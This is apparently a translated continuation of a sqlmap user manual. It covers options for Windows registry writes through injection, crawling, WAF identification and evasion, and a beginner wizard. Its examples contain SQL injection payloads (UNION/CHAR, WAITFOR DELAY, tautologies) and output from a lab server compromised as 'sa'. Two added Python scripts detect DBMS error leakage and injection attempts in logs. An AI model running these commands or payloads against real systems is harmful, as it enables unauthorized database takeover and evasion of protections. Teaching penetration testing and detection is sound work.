sqlmap User Manual [continued]
The earlier "sqlmap User Manual" only covered most of the options you are likely to need; some were left out, so this post fills them in.
PS: most of the sqlmap questions asked in the zone could actually be answered by reading that article through from start to finish. Unfortunately people no longer have the patience to read an article all the way through; they ask for help on each problem as it comes up, without realising how much time they would save later by reading carefully once. Rant over, main text begins:
Operating on the Windows registry
This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the web application supports stacked queries. Naturally, the database user the application connects as must also have the privileges needed to operate on the registry.
Read a registry value
Option: --reg-read
Write a registry value
Option: --reg-add
Delete a registry value
Option: --reg-del
Registry auxiliary options
Options: --reg-key, --reg-value, --reg-data, --reg-type
These must be used together with one of the three options above. Example:
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
General options
Load a session from a SQLite file
Option: -s
sqlmap automatically creates a SQLite file under the output directory for each target; use this option to point it at a specific session file to read.
Save an HTTP(S) traffic log
Option: -t
This option takes a text file; sqlmap writes the log of every HTTP(S) request and response there.
Non-interactive mode
Option: --batch
With this option no user input is required; sqlmap runs straight through using the default answer to every prompt.
Force a character encoding
Option: --charset
Instead of the character set sqlmap detects automatically (e.g. from the Content-Type HTTP header), force a specific one, e.g.:
--charset=GBK
Crawl the website's URLs
Option: --crawl
sqlmap can collect links that are potentially vulnerable; the value given is the crawl depth.
Example:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]
Set the delimiter used in CSV output
Option: --csv-del
When a dump is saved in CSV format (--dump-format=CSV) a delimiter is needed. The default is a comma, but it can be changed, e.g.:
--csv-del=";"
DBMS authentication credentials
Option: --dbms-cred
Sometimes the current user's privileges are insufficient and certain operations fail. If you know the password of a higher-privileged user you can supply it with this option. Some databases have a dedicated mechanism for executing statements as another user, such as Microsoft SQL Server's OPENROWSET function.
Define the dump data format
Option: --dump-format
The output format can be CSV, HTML or SQLITE.
Estimate completion time
Option: --eta
Calculates the time remaining for the data being retrieved.
For example, boolean-based blind injection against Oracle:
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64 ETA 00:19
then:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
sqlmap first outputs the length of the value, then the estimated completion time and a percentage, and finally the retrieved characters.
Flush the session file
Option: --flush-session
If you do not want to use the session file previously cached for this target, use this option. It clears the old session and tests the target again from scratch.
Automatically test form fields
Option: --forms
To test the parameters of a form on a page you can use -r to read a request file, or pass the form data with --data. With --forms, however, sqlmap fetches the page at the URL given with -u and tests the forms it finds there automatically.
Ignore query results stored in the session file
Option: --fresh-queries
Ignores the query results stored in the session file and queries afresh.
Use the DBMS hex function
Option: --hex
Character-encoding problems can sometimes cause data loss; the DBMS hex function can be used to avoid this.
Example against PostgreSQL:
$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
Custom output directory
Option: --output-dir
By default sqlmap saves session and result files under the output folder; use this option to set a custom path, e.g. --output-dir=/tmp
Parse DBMS error messages from responses
Option: --parse-errors
Sometimes the target has not disabled DBMS error reporting, so when a SQL statement fails the error text is returned in the response. With this option sqlmap parses and displays those error messages.
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
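The output above only exists because the application returns raw DBMS error text to the client. As an added defender-side example (not part of the original post or of sqlmap), the following check scans HTTP response bodies for that kind of leakage so it can be caught in a test suite before an attacker's scanner finds it. The signature list and the sample responses are constructed for this example from the error strings quoted above plus the well-known MySQL syntax-error message.

```python
import re
from typing import List, Set, Tuple

# Verbose DBMS error text that should never reach a client. Constructed for this
# example from the messages quoted above (MSSQL/ODBC, pg_query) and the standard
# MySQL syntax error; this is not sqlmap's own error database.
DBMS_ERROR_SIGNATURES = {
    "Microsoft SQL Server": [
        r"\[Microsoft\]\[ODBC SQL Server Driver\]",
        r"Microsoft OLE DB Provider for ODBC Drivers",
        r"ORDER BY position number \d+ is out of range",
    ],
    "PostgreSQL": [
        r"pg_query\(\)",
        r"invalid input syntax for type \w+",
        r"ERROR:\s+syntax error at or near",
    ],
    "MySQL": [
        r"You have an error in your SQL syntax",
    ],
}


def find_dbms_error_leaks(body: str) -> List[Tuple[str, str]]:
    """Return (dbms, matched_text) for every signature found in a response body."""
    hits = []
    for dbms, patterns in DBMS_ERROR_SIGNATURES.items():
        for pattern in patterns:
            m = re.search(pattern, body)
            if m:
                hits.append((dbms, m.group(0)))
    return hits


def leaked_dbms(body: str) -> Set[str]:
    """The set of DBMS products whose error text appears in the body."""
    return {dbms for dbms, _ in find_dbms_error_leaks(body)}


# Constructed sample responses: two mimic the leaks quoted above, the third is a
# hardened generic error page that reveals nothing about the backend.
SAMPLE_MSSQL = ("Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n"
                "[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position "
                "number 10 is out of range of the number of items in the select list.\n"
                "<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>")
SAMPLE_PGSQL = ("pg_query() [function.pg-query]: Query failed: ERROR: invalid input "
                "syntax for type numeric: \":vtj:506f7374:nxb:\" in /var/www/libs/pgsql.inc.php")
SAMPLE_HARDENED = "<html><body>An error occurred. Reference ID: 7f3a9c</body></html>"

if __name__ == "__main__":
    for name, body in [("mssql", SAMPLE_MSSQL), ("pgsql", SAMPLE_PGSQL), ("hardened", SAMPLE_HARDENED)]:
        print(name, find_dbms_error_leaks(body) or "no DBMS error text leaked")
```

Run it against the real error page of an application you own (with detailed errors disabled and a generic handler in place) to confirm it comes back empty.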
Miscellaneous options
Use option mnemonics
Option: -z
When the options become too long and complex, the mnemonic form can be used. For example:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
can be written as:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
And:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
can be written as:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
Alert on successful SQL injection
Option: --alert
Set answers to prompts
Option: --answers
When you want sqlmap to use an answer of your choosing automatically whenever it prompts for input, use this option. Example:
$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
Beep when SQL injection is found
Option: --beep
Emits a beep when a SQL injection is found.
Heuristically detect WAF/IPS/IDS protection
Option: --check-waf
WAF/IPS/IDS protection can cause sqlmap a great deal of trouble. If you suspect the target is protected, this option tests for it: sqlmap sends an injection test through a parameter that does not exist,
for example:
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
If protection is present, the response will probably differ.
Clean up sqlmap's UDFs and tables
Option: --cleanup
Removes the UDFs and tables created by sqlmap during injection.
Disable coloured output
Option: --disable-coloring
sqlmap colours its output by default; use this option to turn colouring off.
Use a specific Google results page
Option: --gpage
By default sqlmap uses the first 100 result URLs for injection testing; with this option you can specify which results page's URLs to test.
Use HTTP parameter pollution
Option: --hpp
HTTP parameter pollution may bypass WAF/IPS/IDS protection mechanisms; it is particularly effective on ASP/IIS and ASP.NET/IIS platforms.
Identify WAF/IPS/IDS protection
Option: --identify-waf
sqlmap can try to identify the WAF/IPS/IDS product so that the user can work out a way around it. Roughly 30 products are currently recognised.
For example, against a MySQL target protected by the ModSecurity WAF:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
Imitate a smartphone
Option: --mobile
Sometimes the server only accepts requests from mobile clients; this option sets a smartphone User-Agent so that sqlmap imitates a phone.
For example:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
Securely delete files in the output directory
Option: --purge-output
When result files need to be deleted so that they cannot be recovered, use this option: the existing files are overwritten with random data before removal.
For example:
$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
Heuristic injection testing
Option: --smart
When testing a very large number of target URLs, this option saves time by only running injection tests against points that heuristics can quickly judge to be injectable, such as those producing DBMS errors.
Example:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
Wizard option for beginners
Option: --wizard
Intended for novice users; it walks you step by step through the inputs needed to test a target for injection.
$ python sqlmap.py --wizard
sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:25:26
Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2986=2986
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True
[*] shutting down at 11:25:52
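The request shapes quoted in this post (the --check-waf probe sent in a non-existent parameter, and the boolean tautology, WAITFOR DELAY and UNION/CHAR() payloads listed by the wizard) are exactly what a defender can look for in web-server logs. The following log scanner is an added example, not part of the original post or of sqlmap; the Apache-style log lines, IP addresses and rule names are constructed for it.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format). The query strings
# mirror the --check-waf probe and the wizard payloads quoted above; the last line
# is a benign search that a naive "union" keyword match would flag.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:02 +0000] "GET /vuln.php?id=1&foobar=AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"
10.0.0.9 - - [12/Mar/2024:10:01:03 +0000] "GET /vuln.php?id=1%20AND%202986%3D2986 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:04 +0000] "GET /vuln.php?id=1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28118%29-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2024:10:01:06 +0000] "GET /search.php?q=union+square HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')

# Detection rules applied to the URL-decoded query string (decoding first defeats
# simple percent-encoding evasion). Names are made up for this example.
RULES = [
    ("union-select",      re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean-tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("mssql-waitfor",     re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("char-concat",       re.compile(r"\bCHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I)),
    ("schema-probe",      re.compile(r"\binformation_schema\.", re.I)),
]


def analyse_log(text):
    """Return {source_ip: set(rule names)} for requests matching any rule, plus a
    'sqlmap-user-agent' marker when the client did not change the default UA."""
    findings = defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        path = m.group("path")
        query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
        for name, rx in RULES:
            if rx.search(query):
                findings[m.group("ip")].add(name)
        if m.group("ua").lower().startswith("sqlmap"):
            findings[m.group("ip")].add("sqlmap-user-agent")
    return dict(findings)


if __name__ == "__main__":
    for ip, rules in analyse_log(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

Several distinct rule names from one source within seconds is the signature of an automated scan rather than a single stray request, which is the condition worth alerting on.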